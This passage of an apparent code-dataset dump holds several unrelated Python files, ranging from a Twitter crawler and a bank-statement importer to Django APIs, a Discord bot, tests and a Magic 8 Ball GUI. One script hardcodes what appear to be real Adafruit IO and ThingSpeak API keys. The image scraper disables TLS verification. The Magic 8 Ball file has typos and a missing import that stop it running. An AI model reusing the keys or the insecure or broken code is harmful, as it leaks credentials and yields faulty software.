True\n break;\n\n if error:\n break;\n\n for media in recent_media:\n create_resource = False\n if hasattr(media, 'text') and media.text is not None:\n create_resource = True\n raw_content = media.text\n if hasattr(media, 'place') and media.place is not None:\n raw_content = raw_content + '. ' + media.place.name\n elif hasattr(media, 'place') and media.place is not None:\n create_resource = True\n raw_content = media.place\n\n ###NUEVO\n if media.id==max_id:\n next=None\n else:\n max_id=media.id\n ####\n \n if create_resource:\n try:\n resource = graph.Resource(\n social_network=SN,\n external_id=media.id,\n url=\"https://twitter.com/\"+media.user.screen_name+\"/status/\"+str(media.id),\n raw_content=raw_content,\n location_name=media.user.location,\n location_lat=None,\n location_lon=None\n )\n#,location_lat=media.location.point.latitude,\n # location_lon=media.location.point.longitude\n\n except AttributeError:\n resource = graph.Resource(\n social_network=SN,\n external_id=media.id,\n url=\"https://twitter.com/\"+media.user.screen_name+\"/status/\"+str(media.id),\n raw_content=raw_content,\n location_name=None,\n location_lat=None,\n location_lon=None\n )\n if resource is not None:\n resources.append(resource)\n\n\n\n if next is None:\n break\n \"\"\"else:\n # get max_id param for the next page of results\n max_id_matcher = MAX_ID_REGEX.search(next)\n if max_id_matcher is not None:\n max_id = max_id_matcher.group(1)\n else:\n break\"\"\"\n return resources\n\n def get_user_followees(self, user):\n '''Get all people that this user follows.'''\n followees = []\n cursor = -1\n while True:\n followees_page = []\n next = ''\n retry = True\n error = False\n while retry:\n try:\n time.sleep(0.7) # be nice with the API\n \n followees_page = api.get_user(user_id=user.external_id).friends(cursor=cursor)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n error = True\n break;\n\n if error:\n break;\n ###Nuevo\n #>>> us.friends(cursor=-1)[1]\n #(0, 1460009616470583290L) si el segundo campo sale 0 es que no hay mas paginas\n if followees_page[1][1]!=0:\n cursor+=1\n else:\n next=None\n ###\n for user_info in followees_page[0]:\n followee = graph.User(\n social_network=SN, \n external_id=user_info.id, \n username=user_info.screen_name, \n url='http://twitter.com/' + user_info.screen_name,\n completed=False\n )\n followees.append(followee)\n\n if next is None:\n break\n \n return followees\n\n# let's crawl Instagram!\ntwitterCrawler(SN).run()\n","sub_path":"twitterCrawler.py","file_name":"twitterCrawler.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"190363871","text":"import csv\nfrom datetime import datetime\nimport locale\nimport re\n\nfrom beancount.core.amount import Amount\nfrom beancount.core import data\nfrom beancount.core.number import Decimal\nfrom beancount.ingest import importer\n\nfrom ._common import change_locale, InvalidFormatError\n\n\nFIELDS = (\n 'Buchungstag',\n 'Wertstellung',\n 'Buchungstext',\n 'Auftraggeber / Begünstigter',\n 'Verwendungszweck',\n 'Kontonummer',\n 'BLZ',\n 'Betrag (EUR)',\n 'Gläubiger-ID',\n 'Mandatsreferenz',\n 'Kundenreferenz',\n)\n\n\nclass ECImporter(importer.ImporterProtocol):\n def __init__(self, iban, account, currency='EUR',\n numeric_locale='de_DE.UTF-8', file_encoding='utf-8'):\n self.account = account\n self.currency = currency\n self.numeric_locale = numeric_locale\n self.file_encoding = file_encoding\n\n self._expected_header_regex = re.compile(\n r\"^\\\"Kontonummer:\\\";\\\"\" +\n re.escape(re.sub(r\"\\s+\", \"\", iban, flags=re.UNICODE)) + \"\\s\",\n re.IGNORECASE\n )\n self._date_from = None\n self._date_to = None\n self._balance = None\n\n def file_account(self, _):\n return self.account\n\n def file_date(self, file_):\n self.extract(file_)\n return self._date_to\n\n def identify(self, file_):\n with open(file_.name, encoding=self.file_encoding) as fd:\n line = fd.readline().strip()\n\n return self._expected_header_regex.match(line)\n\n def extract(self, file_):\n entries = []\n line_index = 0\n closing_balance_index = -1\n\n with change_locale(locale.LC_NUMERIC, self.numeric_locale):\n with open(file_.name, encoding=self.file_encoding) as fd:\n # Header\n line = fd.readline().strip()\n line_index += 1\n\n if not self._expected_header_regex.match(line):\n raise InvalidFormatError()\n\n # Empty line\n line = fd.readline().strip()\n line_index += 1\n\n if line:\n raise InvalidFormatError()\n\n # Meta\n lines = [fd.readline().strip() for _ in range(3)]\n\n reader = csv.reader(lines, delimiter=';',\n quoting=csv.QUOTE_MINIMAL, quotechar='\"')\n\n for line in reader:\n key, value, _ = line\n line_index += 1\n\n if key.startswith('Von'):\n self._date_from = datetime.strptime(\n value, '%d.%m.%Y').date()\n elif key.startswith('Bis'):\n self._date_to = datetime.strptime(\n value, '%d.%m.%Y').date()\n elif key.startswith('Kontostand vom'):\n self._balance = Amount(\n locale.atof(value.rstrip(' EUR'), Decimal),\n self.currency)\n closing_balance_index = line_index\n\n # Another empty line\n line = fd.readline().strip()\n line_index += 1\n\n if line:\n raise InvalidFormatError()\n\n # Data entries\n reader = csv.DictReader(fd, delimiter=';',\n quoting=csv.QUOTE_MINIMAL,\n quotechar='\"')\n\n for line in reader:\n meta = data.new_metadata(file_.name, line_index)\n\n amount = None\n if line['Betrag (EUR)']:\n amount = Amount(locale.atof(line['Betrag (EUR)'],\n Decimal),\n self.currency)\n date = datetime.strptime(\n line['Buchungstag'], '%d.%m.%Y').date()\n\n if line['Verwendungszweck'] == 'Tagessaldo':\n if amount:\n entries.append(\n data.Balance(meta, date, self.account, amount,\n None, None)\n )\n else:\n description = '{} {}'.format(\n line['Buchungstext'],\n line['Verwendungszweck']\n )\n\n postings = [\n data.Posting(self.account, amount, None, None,\n None, None)\n ]\n\n entries.append(\n data.Transaction(\n meta, date, self.FLAG,\n line['Auftraggeber / Begünstigter'],\n description, data.EMPTY_SET, data.EMPTY_SET,\n postings\n )\n )\n\n line_index += 1\n\n # Closing Balance\n meta = data.new_metadata(file_.name, closing_balance_index)\n entries.append(\n data.Balance(meta, self._date_to, self.account,\n self._balance, None, None)\n )\n\n return entries\n","sub_path":"beancount_dkb/ec.py","file_name":"ec.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"473099382","text":"import os\nimport requests\nfrom requests.packages.urllib3.exceptions import *\nfrom lxml import etree\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36'\n}\npage_num = input('(动漫图片小爬虫)请输入你要爬取的页数(不超过8):')\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\ndir = os.getcwd()\nprint(dir)\nif not os.path.exists(dir +'\\\\动漫图片'):\n path = os.makedirs(dir + '\\\\动漫图片')\n print('已创建文件夹[动漫图片]......')\nelse:\n pass\n\npage = 0\nwhile page != int(page_num):\n session = requests.session()\n page = page + 1\n url = 'https://acg18.life/category/picture/normal/page/'+ str(page)\n print('第'+str(page)+'页链接:'+url)\n html = session.get(url,headers = headers,verify=False).text\n html = etree.HTML(html)\n titlelist = html.xpath('//ul[@class=\"posts-ul\"]//h2/a/text()')\n hreflist = html.xpath('//ul[@class=\"posts-ul\"]//h2/a/@href')\n print(hreflist)\n for title,href in zip(titlelist,hreflist):\n print('正在下载此链接所有图册:'+href +title)\n try:\n html = requests.get(href,headers = headers,verify = False).text\n except:\n continue\n html = etree.HTML(html)\n hreflist = html.xpath('//div[@class=\"entry\"]//@lazydata-src')\n i = 0\n for href in hreflist:\n try:\n res = session.get(href,headers = headers,verify=False).content\n except:\n continue\n i = i+1\n dirname = title.replace('/','')\n if not os.path.exists(dir + '\\\\动漫图片\\\\' + dirname):\n path = os.makedirs(dir + '\\\\动漫图片\\\\' + dirname)\n print('已创建文件夹[' + dirname+']......')\n else:\n pass\n filename = dir + '\\\\动漫图片\\\\' + dirname +'\\\\' + title.replace('/','') + href.split('/')[-1]\n if not os.path.exists(filename):\n with open(filename,'wb') as f:\n f.write(res)\n print(href+'下载完成......')\n else:\n continue\n\n print('此链接所有图册:' + href + title + \"下载完成......\\n\")\n","sub_path":"幻想次元二次元图包下载器/幻想次元网站图包下载器.py","file_name":"幻想次元网站图包下载器.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"614276808","text":"import pyperclip\r\nimport re\r\nimport os\r\n\r\nSAVEPATH = 'result.txt'\r\n\r\n\r\nwhile True:\r\n try:\r\n input('Enter to edit text copied in clipboard')\r\n text = pyperclip.paste().encode(\"ascii\", errors=\"ignore\").decode()\r\n regex = input('Enter regex to find: ')\r\n replace = input('Enter text to replace: ')\r\n file = open(SAVEPATH, 'w')\r\n file.write(re.sub(regex, replace, text))\r\n file.close()\r\n os.startfile(SAVEPATH)\r\n except Exception as e:\r\n print(e)","sub_path":".Projects/Python/replaceRegex/replaceRegex.py","file_name":"replaceRegex.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"25044460","text":"#!/usr/bin/python3\nimport time\nimport requests\nfrom Adafruit_IO import Client\n\naio = Client('MonkeyCanCode', '3c49549385104947bae4e60d5db5a060')\n\nwhile True:\n\tprint(\"Ingest data into io.adafruit.com...\")\n\tr = requests.get('https://thingspeak.com/channels/698947/feeds.json?key=PIGU600LAG50NJ3T&results=10')\n\tfor row in r.json()['feeds']:\n\t\tfeed = aio.feeds('pressure')\n\t\taio.send_data(feed.key, float(row['field1']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('altitude')\n\t\taio.send_data(feed.key, float(row['field2']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('concentration')\n\t\taio.send_data(feed.key, float(row['field3']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('light')\n\t\taio.send_data(feed.key, float(row['field4']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('humidity')\n\t\taio.send_data(feed.key, float(row['field5']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('temp')\n\t\taio.send_data(feed.key, float(row['field6']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('vsig')\n\t\taio.send_data(feed.key, float(row['field7']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('bpm')\n\t\taio.send_data(feed.key, float(row['field8']))\n\t\ttime.sleep(2)\n\tprint(\"Ingest data into io.adafruit.com completed\")\n\ttime.sleep(60)\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"105453950","text":"from .serializers import DepartmentSerializer, RegistrationDataSerializer, HRRegistrationSerailizer, EmployeUpdateSerializer\nfrom rest_framework import viewsets, mixins\nfrom .models import User, Department\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom django.db.models import Q\nfrom rest_framework.pagination import PageNumberPagination\nfrom project.custom_permission import IsHREmployee\n\nclass CustomAuthToken(ObtainAuthToken):\n \"\"\"\n custom auth token\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context={'request': request})\n print(serializer)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n print(user)\n token, created = Token.objects.get_or_create(user=user)\n user = User.objects.get(pk=user.id)\n print(user)\n response = {\n \"data\": {\n 'token': token.key,\n 'user_id': user.pk,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n }\n }\n response['status'] = {\"status\": \"User logged in successfully.\"}\n return Response(response)\n\n\nclass DepartmentApi(viewsets.ModelViewSet):\n '''\n Department Api for CRUD operation\n '''\n queryset = Department.objects.all()\n serializer_class = DepartmentSerializer\n pagination_class = PageNumberPagination\n\n\nclass EmployeeDataApi(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n employee_address: we have to pass address objects in list like:\n [{\"address\": \"Gali no. 4\", \"country\": \"India\",\"city\": \"karnal\",\"zip\": 12345},\n {\"address\": \"casd\",\"country\": \"India\",\"city\": \"karnal\",\"zip\": 12345}]\n :return\n \"\"\"\n queryset = User.objects.filter(is_employee=True, is_active=True)\n serializer_class = RegistrationDataSerializer\n permission_classes = [IsAuthenticated, IsHREmployee]\n pagination_class = PageNumberPagination\n\n def get_serializer_class(self):\n serializer = RegistrationDataSerializer\n if self.action == 'update':\n serializer = EmployeUpdateSerializer\n return serializer\n\n def create(self, request, *args, **kwargs):\n serialized = self.serializer_class(data=request.data, context={'request': request})\n if serialized.is_valid(raise_exception=True):\n user = serialized.create(validated_data=serialized.data)\n serialized = self.serializer_class(user)\n response = serialized.data\n response['success_message_head'] = \"Successfully Created\"\n return Response(response, status=201)\n\n\nclass HRRegisterApi(mixins.CreateModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet):\n '''HR Api to perform create and listing of HR'''\n queryset = User.objects.filter(is_hr=True, is_active=True)\n serializer_class = HRRegistrationSerailizer\n pagination_class = PageNumberPagination","sub_path":"hrm/project/accounts/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"131375436","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport traceback\r\nimport asyncio\r\nfrom asyncio import sleep\r\n\r\nclass Utility():\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n\r\n\r\n @commands.command(aliases=['calc'])\r\n async def calculate(self, ctx, left: int, type, right: int):\r\n '''Calculate an equation\r\nEx:\r\n!?calculate [number] [ + | * | - | ^ | / ] [number]'''\r\n if type == '*':\r\n return await ctx.send(left * right)\r\n if type == '+':\r\n return await ctx.send(left + right)\r\n if type == '-':\r\n return await ctx.send(left - right)\r\n if type == '/':\r\n return await ctx.send(left / right)\r\n if type == '^':\r\n return await ctx.send(left ^ right)\r\n await ctx.send('Invalid equation')\r\n\r\n\r\n\r\n\r\n @commands.command()\r\n async def avatar(self, ctx, user: discord.Member=None):\r\n '''Get a member's avatar\r\nEx:\r\n!?avatar @kian_8x'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n e = discord.Embed(description=f'[{user}\\'s avatar]( {user.avatar_url} )', color=discord.Colour.blurple())\r\n e.set_image(url=user.avatar_url)\r\n await ctx.send(embed=e)\r\n\r\n\r\n @commands.command()\r\n async def roles(self, ctx):\r\n '''Get the server roles'''\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name=f'Server roles [{len(ctx.guild.roles)}]', value=', '.join(g.name for g in ctx.guild.roles))\r\n await ctx.send(embed=a)\r\n\r\n\r\n @commands.command(aliases=['memberoles'])\r\n async def userroles(self, ctx, user: discord.Member=None):\r\n '''Get a user's roles\r\nEx:\r\n!?userroles @luke'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name=f'{user}\\'s roles [{len(ctx.author.roles)}]', value=', '.join(g.name for g in ctx.author.roles))\r\n await ctx.send(embed=a)\r\n\r\n\r\n @commands.command()\r\n async def userinfo(self, ctx, user: discord.Member=None):\r\n '''Get a user's info\r\nEx:\r\n!?userinfo @magazinsnow'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name='Name:', value=f'{user.name}')\r\n a.add_field(name='ID:', value=f\"{user.id}\")\r\n a.add_field(name='Bot:', value=f'{user.bot}')\r\n a.add_field(name='Discrim:', value=f'{user.discriminator}')\r\n a.add_field(name='Top Role', value=f'{user.top_role}')\r\n a.add_field(name=f'Roles [{len(user.roles)}]', value=', '.join(g.name for g in user.roles))\r\n a.set_thumbnail(url=user.avatar_url)\r\n await ctx.send(embed=a)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Utility(bot))\r\n","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"406536120","text":"import unittest\nimport numpy as np\nimport numpy.testing as npt\nfrom search.import_functions import (crop_to_square, normalize)\n\n\nclass TestSearch(unittest.TestCase):\n \n def test_crop_to_square(self):\n np.random.seed(0)\n test_slice = np.random.rand(91,109)\n square_slice = crop_to_square(test_slice)\n \n expected_slice = np.zeros((96,96))\n expected_slice[3:94,:] = test_slice[:,8:104]\n \n npt.assert_array_equal(square_slice, expected_slice)\n \n def test_normalize(self):\n np.random.seed(0)\n test_slice = np.random.rand(96,96)\n norm_slice = normalize(test_slice)\n \n expected_slice = (test_slice - np.mean(test_slice)) / np.std(test_slice)\n \n npt.assert_array_equal(norm_slice, expected_slice)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"tests/test_import_functions.py","file_name":"test_import_functions.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"16814806","text":"import random\r\nfrom tkinter import *\r\n\r\nanswers = [\"It is certain.\", \"It is decidedly so.\",\r\n \"Without a doubt.\", \"Yes - definitely!\",\r\n \"You may rely on it.\", \"As I see it, yes.\",\r\n \"Most likely.\", \"Outlook good.\",\r\n \"Yes.\", \"Signs point to yes.\",\r\n \"Reply hazy, please try again.\", \"Ask again later.\",\r\n \"Better not tell you now.\", \"Cannot predict now.\",\r\n \"Concentrate and ask again.\", \"Don't count on it.\",\r\n \"My reply is no.\", \"My sources say no.\",\r\n \"Outlook not so good.\", \"Very doubtful.\"]\r\n\r\n\r\n\r\n\r\n\r\ndef submit():\r\n question = ask_box.get()\r\n message = \"You didn't ask anything!\"\r\n if question:\r\n message = choice(answers)\r\n display(message)\r\n\r\ndef display(message):\r\n ask_box.delete(0, END)\r\n txt[\"state\"] = \"normal\"\r\n txt.delete(0.0, END)\r\n txt.insert(0.0, message)\r\n txt[\"state\"] = \"disabled\"\r\n\r\n# set up the GUI\r\nroot = Tk()\r\napp = Frame(root)\r\napp.grid()\r\nroot.title(\"Magic 8 Ball\")\r\nroot.geometry(\"300x400\")\r\n\r\nasl_lbl = Label(app, text=\"please ask a yes or no question\")\r\nask_lbl.grid(columnspan=3, pady=5, padx=10)\r\n\r\nask_box = Entry(app, width=30)\r\nask_box.grid(colomnspan=3, pady=5, padx=10)\r\nask_box.focus_force()\r\n\r\nshake = Button(app, text=\"Shake the 8 Ball.\")\r\nshake[\"command\"] = submit\r\nshake.grid(colomn=1, pady=5)\r\n\r\ntxt = Text(app, width=30, height=3, wrap=WORD, state=DISABLED)\r\ntxt.grid(colomnspan=3, pady=5, padx=5)\r\n\r\nroot.mainloop()\r\n\r\ndef ask_question():\r\n question = input(\"Hello! Please ask a yes or no question.\")\r\n\r\n\r\ndef give_an_answer():\r\n yes = [\"Definetly!\", \"Hopefull :) \", \" Surely!\", \"I am certiain of it ;)\", \"Why not :)\"]\r\n no = [\"That is impossible!\", \"Nope\", \"Surely not!\", \"Hell no!\"]\r\n maybe = [\"Maybe\", \"It can go both ways...\", \"Hmm...You will need to figure this out yourself...\", \"idk\",\r\n \"ask later...\", \"What kind pf a question is that???\"]\r\n number_of_yes = len(yes) - 1\r\n number_of_no = len(no) - 1\r\n number_of_maybe = len(maybe) - 1\r\n random1or2or3 = random.randint(1, 3)\r\n if random1or2or3 == 1:\r\n x = random.randint(0, number_of_yes)\r\n print(yes[x])\r\n elif random1or2or3 == 2:\r\n y = random.randint(0, number_of_no)\r\n print(no[y])\r\n elif random1or2or3 == 3:\r\n z = random.randint(0, number_of_maybe)\r\n print(maybe[z])\r\n\r\n\r\nwhile 1 < 2:\r\n ask_question()\r\n give_an_answer()\r\n","sub_path":"LearningPython/FireTechCamp/Day3/Magic 8 ball.py","file_name":"Magic 8 ball.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"388352852","text":"# Resolve the problem!!\nimport re\n\n\ndef run():\n # Start coding here\n with open('src/encoded.txt', mode='r', encoding='utf-8') as f:\n result = ''.join(re.findall('[a-z]', f.read()))\n print(result)\n\nif __name__ == '__main__':\n run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"269709443","text":"n_mes= int(input( 'n: '))\nlista=[]*13\nlista [0]= 'nada'\nlista [1]= 'Jan'\nlista [2]= 'Fev'\nlista [3]= 'Mar'\nlista [4]= 'Abril'\nlista [5]= 'Maio'\nlista [6]= 'Junho'\nlista [7]= 'julho'\nlista [8]= 'agosto'\nlista [9]= 'setembro'\nlista [10]= 'out'\nlista [11]= 'nov'\nlista [12]= 'dez'","sub_path":"backup/user_373/ch43_2020_04_13_05_57_09_465042.py","file_name":"ch43_2020_04_13_05_57_09_465042.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"191628759","text":"from django.contrib import admin\nfrom .models import Blog_news, Category, Information\nfrom tinymce.widgets import TinyMCE\nfrom django.db import models\n\nclass Blog_newsAdmin(admin.ModelAdmin):\n\tfields=('title', 'publieshed_date', 'text', 'image', 'urls_slung')\n\n\tformfield_overrides = {\n\t\t\tmodels.TextField: {'widget': TinyMCE(),},\n\t}\n\nclass Information_admin(admin.ModelAdmin):\n\tformfield_overrides = {\n\t\t\tmodels.TextField: {'widget': TinyMCE(),},\n\t}\n\n#\tfielsets=[\"\"]\nadmin.site.register(Blog_news, Blog_newsAdmin)\nadmin.site.register(Category)\nadmin.site.register(Information, Information_admin)","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"306123272","text":"\n\nfrom xai.brain.wordbase.nouns._patchwork import _PATCHWORK\n\n#calss header\nclass _PATCHWORKS(_PATCHWORK, ):\n\tdef __init__(self,): \n\t\t_PATCHWORK.__init__(self)\n\t\tself.name = \"PATCHWORKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"patchwork\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_patchworks.py","file_name":"_patchworks.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"206590897","text":"# -*- coding = utf-8 -*- \n\n# 感知机算法 \n\ndataSet = [\n [0,0,0,1],\n [1,0,0,1],\n [1,0,1,1],\n [1,1,0,1],\n [0,0,-1,-1],\n [0,-1,-1,-1],\n [0,-1,0,-1],\n [-1,-1,-1,-1],\n]\n\ndimension = 4\nW = [-1,-2,-2,0]\n\ndef getProduct(data, w):\n print(\"calc\")\n print(data)\n print(w)\n res = 0 \n for i in range(dimension):\n res = res + data[i]*w[i] \n print(res)\n print()\n \n return res \n\ndef updateW(data, w):\n print(\"update\")\n print(data)\n print(w)\n for i in range(dimension):\n w[i] = w[i] + data[i] \n print(w)\n print()\n\nisChanged = True \nwhile(isChanged):\n isChanged = False \n for data in dataSet :\n temp = getProduct(data, W) \n if temp <= 0:\n updateW(data, W) \n isChanged = True \n\n","sub_path":"2019spring/AI/HW4/PML.py","file_name":"PML.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"48442241","text":"from sklearn.ensemble import RandomForestRegressor\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\nimport os\n\ndef set_missing_ages_mean(df):\n '''use randomforest to fill the missing data'''\n # print('df : \\n', df)\n age_df = df[['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] #将上述项从dataframe里面提取出来\n \n ###############################################\n ############ 通过Name中的信息来对未知年龄使用平均值代替 ##############\n known_age = age_df[age_df.Age.notnull()]\n \n unknown_age = age_df[age_df.Age.isnull()]\n ### 平均Mr的年龄\n known_age_Mr = known_age[known_age['Name'].str.contains('Mr\\.')]\n \n unknown_age_Mr = unknown_age[unknown_age['Name'].str.contains('Mr\\.')]\n \n unknown_age_Mr['Age'].fillna(known_age_Mr['Age'].mean(), inplace = True)\n \n age_df.iloc[unknown_age_Mr.index.tolist(), :] = unknown_age_Mr\n \n ### 平均Mrs的年龄\n known_age_Mrs = known_age[known_age['Name'].str.contains('Mrs\\.')]\n \n unknown_age_Mrs = unknown_age[unknown_age['Name'].str.contains('Mrs\\.')]\n \n unknown_age_Mrs['Age'].fillna(known_age_Mrs['Age'].mean(), inplace = True)\n \n age_df.iloc[unknown_age_Mrs.index.tolist(), :] = unknown_age_Mrs\n \n ### 平均Miss的年龄\n known_age_Miss = known_age[known_age['Name'].str.contains('Miss\\.')]\n \n unknown_age_Miss = unknown_age[unknown_age['Name'].str.contains('Miss\\.')]\n \n unknown_age_Miss['Age'].fillna(known_age_Miss['Age'].mean(), inplace = True)\n \n age_df.iloc[unknown_age_Miss.index.tolist(), :] = unknown_age_Miss\n \n ### 平均Dr的年龄\n known_age_Dr = known_age[known_age['Name'].str.contains('Dr\\.')]\n \n unknown_age_Dr = unknown_age[unknown_age['Name'].str.contains('Dr\\.')]\n \n unknown_age_Dr['Age'].fillna(known_age_Dr['Age'].mean(), inplace = True)\n \n age_df.iloc[unknown_age_Dr.index.tolist(), :] = unknown_age_Dr\n \n ### 平均Master的年龄\n known_age_Master = known_age[known_age['Name'].str.contains('Master\\.')]\n \n unknown_age_Master = unknown_age[unknown_age['Name'].str.contains('Master\\.')]\n \n unknown_age_Master['Age'].fillna(known_age_Master['Age'].mean(), inplace = True)\n \n age_df.iloc[unknown_age_Master.index.tolist(), :] = unknown_age_Master\n ### test里面出现了Ms.年龄缺失\n unknown_age_Ms = unknown_age[unknown_age['Name'].str.contains('Ms\\.')]\n \n unknown_age_Ms['Age'].fillna(40, inplace = True)\n \n age_df.iloc[unknown_age_Ms.index.tolist(), :] = unknown_age_Ms\n \n print('df before: \\n', df)\n \n print('age_df : \\n', age_df)\n \n # df.iloc[age_df.index.tolist(), ['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] = age_df\n \n \n \n df.loc[age_df.index.tolist(), ['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] = age_df\n \n print('df after: \\n', df)\n \n # os.system(\"pause\")\n \n return df\n \ndef set_missing_ages_rf(df):\n ##############################################\n ########### 使用随机森林来拟合年龄 ###########\n age_df = df[['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] #将上述项从dataframe里面提取出来\n \n known_age = age_df[age_df.Age.notnull()]\n \n unknown_age = age_df[age_df.Age.isnull()]\n \n y = known_age.values[:, 0]\n \n # print('y : ', y)\n \n X = known_age.values[:, 1:]\n \n # print('X : ', X)\n \n rfr = RandomForestRegressor(random_state = 0, n_estimators = 2000, n_jobs = -1)\n \n rfr.fit(X, y) # 随机森林回归\n \n print('unknown_age.values : \\n', unknown_age.values)\n \n predictedAges = rfr.predict(unknown_age.values[:, 1:])\n \n print('predictedAges : \\n', predictedAges)\n \n df.loc[(df.Age.isnull()), 'Age'] = predictedAges\n \n return df\n ##############################################\n \ndef set_Cabin_type(df):\n df.loc[(df.Cabin.notnull()), 'Cabin'] = \"Yes\"\n df.loc[(df.Cabin.isnull()), 'Cabin'] = \"No\"\n return df\n \n","sub_path":"data_missing.py","file_name":"data_missing.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"27407598","text":"import os\nfrom datetime import datetime\nfrom unittest.mock import Mock\nfrom urllib.parse import quote, urlparse\n\nimport pendulum\nimport pytest\nfrom flask import session, url_for\n\nfrom atat.domain.auth import UNPROTECTED_ROUTES\nfrom atat.domain.exceptions import NotFoundError\nfrom atat.domain.users import Users\nfrom tests.factories import UserFactory\nfrom tests.utils import FakeLogger\n\nPROTECTED_URL = \"/home\"\n\n\ndef test_home_page_with_complete_profile(client, user_session):\n user = UserFactory.create()\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 200\n\n\ndef test_redirect_when_profile_missing_fields(client, user_session):\n user = UserFactory.create(email=None)\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 302\n assert \"/user?next={}\".format(quote(PROTECTED_URL, safe=\"\")) in response.location\n\n\ndef test_unprotected_route_with_incomplete_profile(client, user_session):\n user = UserFactory.create()\n user_session(user)\n response = client.get(\"/about\", follow_redirects=False)\n assert response.status_code == 200\n\n\ndef test_completing_user_profile(client, user_session):\n user = UserFactory.create(phone_number=None)\n user_session(user)\n response = client.get(PROTECTED_URL, follow_redirects=True)\n assert b\"You must complete your profile\" in response.data\n\n updated_data = {**user.to_dictionary(), \"phone_number\": \"5558675309\"}\n response = client.post(url_for(\"users.update_user\"), data=updated_data)\n assert response.status_code == 200\n\n response = client.get(PROTECTED_URL, follow_redirects=False)\n assert response.status_code == 200\n assert b\"You must complete your profile\" not in response.data\n\n\n@pytest.fixture\ndef mock_login(monkeypatch):\n def _mock_login(user, client, **kwargs):\n monkeypatch.setattr(\n \"atat.routes.load_attributes_from_assertion\", lambda *a: None\n )\n monkeypatch.setattr(\n \"atat.routes.get_user_from_saml_attributes\", lambda *a: user\n )\n return client.post(url_for(\"atat.login\", acs=\"\"))\n\n return _mock_login\n\n\n# checks that all of the routes in the app are 